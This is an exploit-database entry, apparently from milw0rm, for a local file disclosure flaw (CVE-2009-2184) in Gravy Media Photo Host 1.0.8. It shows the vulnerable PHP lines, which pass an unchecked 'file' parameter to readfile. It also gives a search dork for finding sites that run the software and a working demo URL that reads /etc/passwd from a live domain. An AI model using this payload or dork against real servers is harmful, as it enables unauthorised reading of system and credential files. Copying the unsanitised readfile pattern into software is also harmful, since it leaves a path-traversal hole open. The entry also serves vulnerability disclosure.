EXPLOITS

Gravy Media Photo Host 1.0.8 - Local File Disclosure

Author: Lo$er
type: webapps
platform: php
port: 
date_added: 2009-06-21  
date_updated:   
verified: 1  
codes: OSVDB-55280;CVE-2009-2184  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 8996.txt  

==================================================================
=========Gravy Media Photo Host 1.0.8 Local File Inclusion========
==================================================================

Vendor:http://www.gravy-media.com/
Download:register to download
Dork:"Powered by Gravy Media"
Discovered By:Lo$er

====Vulnerable code(forcedownload.php)====
27. $filename = $_GET['file'];

70. readfile("$filename");
====Demo====

http://www.gravy-media.com/v108/forcedownload.php?file=%2Fetc%2Fpasswd

# milw0rm.com [2009-06-22]